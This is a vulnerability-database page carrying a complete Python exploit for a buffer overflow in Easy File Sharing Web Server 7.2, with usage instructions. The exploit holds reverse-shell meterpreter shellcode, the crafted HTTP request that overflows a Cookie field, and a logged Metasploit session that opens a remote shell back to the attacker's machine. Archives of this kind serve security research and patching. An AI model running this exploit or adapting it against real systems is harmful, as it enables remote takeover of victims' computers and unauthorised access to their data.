Vulners
Lucene search
Easy File Sharing Web Server 7.2 Buffer Overflow
`#!/usr/bin/python
#Easy File Sharing Web Server 7.2 - SEH Exploit - Tested successfully on Windows 10 x64
#GET 'passWD' Buffer Overflow(SEH)
#pop pop ret @ 0x100195f2 : pop esi pop ecx ret in ImageLoad.dll
#Author: N_A , N_A[at]tutanota.com
#OS Name: Microsoft Windows 10 Home
#OS Version: 10.0.14393 N/A Build 14393
#System Type: x64-based PC
#Vendor: http://www.sharing-file.com
#Greets: clubjk, wetw0rk - dude whut up? Sorry man i need to get down and code some BHP with you like our agreement. Raw sockets() for me :)
#Set me a task you want me to complete bro :)) Speak soon man!
#Note on exploitation: Very strange, sometimes works on the second attempt.
#root@kali:~/exploits# python naefsw.py 192.168.142.1 80
#[*]Connection to: 192.168.142.1 successful!
#[*]Evil buffer sent. G0t sh3ll?
#msf > use exploit/multi/handler
#msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
#payload => windows/meterpreter/reverse_tcp
#msf exploit(handler) > set lhost 192.168.142.128
#lhost => 192.168.142.128
#msf exploit(handler) > set lport 443
#lport => 443
#msf exploit(handler) > exploit
#[*] Started reverse TCP handler on 192.168.142.128:443
#[*] Starting the payload handler...
#[*] Sending stage (957999 bytes) to 192.168.142.1
#[*] Meterpreter session 1 opened (192.168.142.128:443 -> 192.168.142.1:57087) at 2017-07-15 07:27:54 +0100
#meterpreter > shell
#Process 9772 created.
#Channel 1 created.
#Microsoft Windows [Version 10.0.14393]
#(c) 2016 Microsoft Corporation. All rights reserved.
#
#C:\Users\NA\Desktop>
import socket, sys
def usage():
print("===============================================================================\n")
print("\t[*]Easy File Sharing Web Server 7.2 - SEH Exploit[*]\n")
print("\t[*]Spawns a reverse meterpreter shell :>[*]\n")
print("\t[*]By N_A[*]\n")
print("\t[*]Usage: [host] [port][*]\n")
print("\t[*]" +sys.argv[0] + " 192.168.142.128 80[*]\n")
print("===============================================================================\n")
if len(sys.argv) < 2:
usage()
sys.exit()
vuln = sys.argv[1] #remote host
port = sys.argv[2] #port
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.128 LPORT=443 -f c -b "\x00"
buf = ("\xdb\xc2\xb8\x2d\xb8\x07\x99\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x54\x83\xeb\xfc\x31\x43\x14\x03\x43\x39\x5a\xf2\x65\xa9\x18"
"\xfd\x95\x29\x7d\x77\x70\x18\xbd\xe3\xf0\x0a\x0d\x67\x54\xa6"
"\xe6\x25\x4d\x3d\x8a\xe1\x62\xf6\x21\xd4\x4d\x07\x19\x24\xcf"
"\x8b\x60\x79\x2f\xb2\xaa\x8c\x2e\xf3\xd7\x7d\x62\xac\x9c\xd0"
"\x93\xd9\xe9\xe8\x18\x91\xfc\x68\xfc\x61\xfe\x59\x53\xfa\x59"
"\x7a\x55\x2f\xd2\x33\x4d\x2c\xdf\x8a\xe6\x86\xab\x0c\x2f\xd7"
"\x54\xa2\x0e\xd8\xa6\xba\x57\xde\x58\xc9\xa1\x1d\xe4\xca\x75"
"\x5c\x32\x5e\x6e\xc6\xb1\xf8\x4a\xf7\x16\x9e\x19\xfb\xd3\xd4"
"\x46\x1f\xe5\x39\xfd\x1b\x6e\xbc\xd2\xaa\x34\x9b\xf6\xf7\xef"
"\x82\xaf\x5d\x41\xba\xb0\x3e\x3e\x1e\xba\xd2\x2b\x13\xe1\xba"
"\x98\x1e\x1a\x3a\xb7\x29\x69\x08\x18\x82\xe5\x20\xd1\x0c\xf1"
"\x47\xc8\xe9\x6d\xb6\xf3\x09\xa7\x7c\xa7\x59\xdf\x55\xc8\x31"
"\x1f\x5a\x1d\xaf\x1a\xcc\x5e\x98\xab\x8c\x37\xdb\xb3\x8d\x7c"
"\x52\x55\xdd\xd2\x35\xca\x9d\x82\xf5\xba\x75\xc9\xf9\xe5\x65"
"\xf2\xd3\x8d\x0f\x1d\x8a\xe6\xa7\x84\x97\x7d\x56\x48\x02\xf8"
"\x58\xc2\xa7\xfc\x16\x23\xcd\xee\x4e\x52\x2d\xef\x8e\xff\x2d"
"\x85\x8a\xa9\x7a\x31\x90\x8c\x4d\x9e\x6b\xfb\xcd\xd9\x93\x7a"
"\xe4\x92\xa5\xe8\x48\xcd\xc9\xfc\x48\x0d\x9f\x96\x48\x65\x47"
"\xc3\x1a\x90\x88\xde\x0e\x09\x1c\xe1\x66\xfd\xb7\x89\x84\xd8"
"\xff\x15\x76\x0f\x7c\x51\x88\xcd\xa0\xfa\xe1\x2d\xe4\xfa\xf1"
"\x47\xe4\xaa\x99\x9c\xcb\x45\x6a\x5c\xc6\x0d\xe2\xd7\x86\xfc"
"\x93\xe8\x83\xa1\x0d\xe8\x27\x7a\x5b\x67\xc8\x7d\x64\x89\xf5"
"\xab\x5d\xff\x3e\x68\xda\xf0\x75\xcd\x4b\x9b\x75\x41\x8b\x8e")
seh = "\xeb\x0a\x90\x90" #jump code right here
nseh = "\xF2\x95\x01\x10" #pop pop ret @ 0x100195f2 : pop esi pop ecx ret in ImageLoad.dll
nops = "\x90"
evilbuffer = "A" * 57 + seh + nseh + nops * 10 + buf + "C" * 2000
evil = "GET /vfolder.ghp HTTP/1.1\r\n"
evil += "Host: " + vuln + "\r\n"
evil += "Cookie: SESSIONID=9999; UserID=PassWD=" + evilbuffer + "; frmUserName=; frmUserPass=;\r\n"
evil += "Connection: keep-alive" + "\r\n"
evil += "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect((vuln, int(port)))
print "\n[*]Connection to: " + vuln + " successful!"
except:
print "[*]Connection Error.Exiting.."
sys.exit(0)
print "[*]Evil buffer sent. G0t sh3ll?\n"
s.send(evil)
s.close()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jul 2017 00:00Current
0.5Low risk
Vulners AI Score0.5